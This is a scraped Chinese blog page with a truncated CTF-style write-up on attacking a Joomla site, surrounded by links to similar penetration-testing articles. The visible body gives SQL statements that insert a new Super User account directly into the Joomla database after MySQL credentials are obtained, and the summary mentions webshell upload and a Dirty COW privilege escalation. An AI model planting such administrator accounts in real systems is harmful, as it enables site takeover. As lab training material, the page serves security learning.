joomla渗透测试（脏牛提权）

JoomlaCMS渗透实战

最新推荐文章于 2024-01-06 16:48:54 发布

原创

最新推荐文章于 2024-01-06 16:48:54 发布 · 1.2k 阅读

3 ·

CC 4.0 BY-SA版权

本文详细介绍了通过JoomlaCMS进行渗透测试的过程，包括利用漏洞获取MySQL账号密码、创建管理员账户、上传并利用webshell，以及如何绕过disable_function限制执行系统命令，最终实现提权。

本来是个域渗透，不过环境有问题，就当作web题在做了

解题过程

在这里插入图片描述这是一个joomla cms

连接mysql
得到MySQL的账号和密码
在这里插入图片描述然后创建新的管理员

 INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8')

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HyyMbb

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Vulnhub靶场案例渗透[4]- DC3

qq_45776114的博客

10-08

969

执行获取到数据库中保存的用户admin的账号和密码。通过代码仓库源代码和数据库存储的密码形式，得知使用的是。通过虚拟机设置的网络适配器的设置，确认虚拟机的网段，使用nmap进行目标网段存活主机，确定靶机ip。的具体版本可以谷歌搜索相关漏洞，最后找到一个github利用Joomla漏洞仓库。,说明当前连接缺少交互式终端,使用python创建一个伪终端，提升交互。探测README.txt文件,确认网站使用的是开源模板网站。利用的是Joomla使用的一个组件的sql注入漏洞。去除已知设备的ip，得出靶机ip。

内网域渗透总结——红日靶场③

weixin_74545038的博客

11-30

1818

红日靶场三渗透总结

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)

qq_45722813的博客

12-07

3243

Vulnhub靶场渗透测试DC-3 靶机下载地址：https://www.five86.com/dc-3.html 攻击机为kali2021，IP地址：192.168.172.131 将靶机导入到VMware，设置网络模式为NAT模式，开启靶机虚拟机在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址，命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP，可能是靶机网络设置问题，参考文章：https://editor.youkuaiyun.com/md/?artic

Joomla!网站扫描工具joomscan

weixin_34362875的博客

07-27

677

2019独角兽企业重金招聘Python工程师标准>>> ...

【CyberSecurityLearning 72】DC系列之DC-3渗透测试（Joomla）

_Co1a

04-24

1300

目录 DC-3靶机渗透测试 一、实验环境二、渗透过程演示 1、信息搜集 2、SQL注入 3、登录后台 4、反弹shell 5、提权总结： DC-3靶机渗透测试 DC-3也是一个黑盒测试，我们所能知道的只有它的MAC地址，我们可以根据它的MAC地址来确定IP地址一、实验环境实验环境： kali2021：192.168.3.155/24（桥接到vmnet0）靶机环境DC-3（桥接到vmnet0，MAC地址：00:0C:29:2C:47:A4） ...

Metasploit6.0系列教程 -- 渗透Joomla网站

Web安全工具库

10-19

2554

一、使用Metasploit对Joomal进行侦察 1、探测版本信息选择joomla_version辅助模块，设置端口号及IP地址，run运行 use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run 2、页面枚举选择Joomla_pages辅助模块，设置端口号及IP地址，run运行 use auxiliary/scanner/http/joomla_pagesset rhos

CVE-2016-8870(Joomla 提权类漏洞 )

Fly_鹏程万里

03-15

1795

前言 Joomla是一套全球知名的内容管理系统。Joomla是使用PHP语言加上MySQL数据库所开发的软件系统，可以在Linux、Windows、MacOSX等各种不同的平台上执行。目前是由OpenSourceMatters这个开放源码组织进行开发与支持。漏洞编号 CVE-2016-8870 漏洞影响范围 joomal 3.4.4 ~3.6.3 漏洞分析在存在漏洞的...

渗透测试面试题2019版.pdf

最新发布

03-14

- Windows系统下的溢出提权、Linux系统下的脏牛漏洞、内核版本漏洞提权等。 ### 清除测试痕迹与报告编写 **4. 清理测试数据** - 在完成渗透测试后，确保清除所有测试过程中产生的数据和痕迹。 - 包括删除WebShell...

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

weixin_46280935的博客

09-10

6521

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合文章/书籍/教程相关说明请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏

VULNHUB靶机渗透——DC-3(JoomlaCMS漏洞和Ubuntu16.04本地提权漏洞)

aarong的博客

12-31

2491

网络拓扑：攻击机kali和靶机dc-3同在NAT模式下信息收集： arp-scan和nmap扫描： arp-scan -l nmap -T4 -A -v -p 1-65535 192.168.65.137 靶机开了80端口，待会浏览器访问扫描出了Joomla好像是一个网络模板，百度搜一下看看：猜对了，这就是一个网络模板浏览器访问：作者提示这次只有一个flag，要提权到root才能看到，并且没有任何提示。 dirsearch扫描网站路径：dirsearch -u http://192.1

CVE-2015-7857 Joomla注入漏洞利用工具

04-18

CVE-2015-7857 Joomla注入漏洞利用工具，有需要自行下载

xss、脏牛提权.zip

06-18

包含xss注入闯关小游戏和脏牛提权exp等干货

vulnhub靶场之DC-3渗透教程（Joomla CMS）

我是网络安全兼技能大赛工程师，专注网络安全技术学习与技能大赛实战！持续分享最新的技术文章，帮你少走弯路，一起在技术赛道上进步～

06-06

1762

靶机下载链接作者DCAU发布日期2020年4月25日难度中等1、这个靶场主要考了Joomla的cms框架，然后就是一个外部的提权文件来进行提权2、因此还是得要多熟悉一下常用的cms，说实话，这个上传点还找了蛮久的哈哈哈3、希望有不足之处，欢迎各位师傅点评一下！

【甄选靶场】Vulnhub百个项目渗透——项目四十三：BORN2ROOT-2（joomla）

人间体佐菲的博客

10-17

916

【甄选靶场】Vulnhub百个项目渗透——项目十：IMF-1（joomla）

Joomla! 任意用户注册与提权漏洞请及时更新

weixin_34018202的博客

10-31

400

2019独角兽企业重金招聘Python工程师标准>>> ...

【靶场设计和渗透】

qq_55213436的博客

04-17

1707

为了深入贯彻学习网络安全法律法规，深入学习渗透测试知识，强化实战技能............编不出来了，反正今天的主题就是设计一个靶场然后渗透一遍。

THM-Daily Bugle-joomla&sql报错注入&rce-sudo yum提权

yangmahaonan的博客

01-06

506

用户名是jonah,密码是$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm。这里有一串password是，经过尝试并不是root的密码而是jjameson的。可以看到joomla版本是3.7.0,搜索一下相关漏洞，发现可以进行报错注入。最后发现有70多个表（吐了），其中有个表是users,可以看到用户和密码。可以看到这是个Joomla-CMS,用joomscan扫描一下。最终密码是spiderman123,现在可以登录进去了。

Vulnhub之 DC-3 joomla注入和ubuntu16.04提权

ST0new的博客

07-21

1439

Vulnhub靶机之DC-3 前言刚考完试，然而不能放弃对技术的热爱，又重新拾起了dc准备把他们6个做完今天介绍的是dc-3 ，来看看作者对他的评价描述： DC-3是另一个专门建造的脆弱实验室，旨在获得渗透测试领域的经验。与之前的DC版本一样，这个版本在设计时考虑了初学者，虽然这一次，只有一个标志，一个入口点，根本没有线索。 Linux技能和熟悉Linux命令行是必须的，基本渗透测...

利用Vulnhub复现漏洞 - Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

JiangBuLiu的博客

07-12

4223

@[TOC](Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境) Vulnhub官方复现教程 https://vulhub.org/#/environments/joomla/CVE-2017-8917/ 漏洞原理 com_fields组件出现漏洞，com_fields组件是在3.7版本添加的，如果你使用此版本，将受到影响，并应尽快更新。这个组件可以公开访问，意味着任何...

基于Joomla的渗透测试及加固

07-27

在进行渗透测试和加固时，以下是一些步骤和建议可以帮助保护基于Joomla的网站： 渗透测试： 1. 信息收集：了解目标网站的架构、版本和插件信息。可以使用工具如Wappalyzer、Joomscan等来获取这些信息。 2. 漏洞...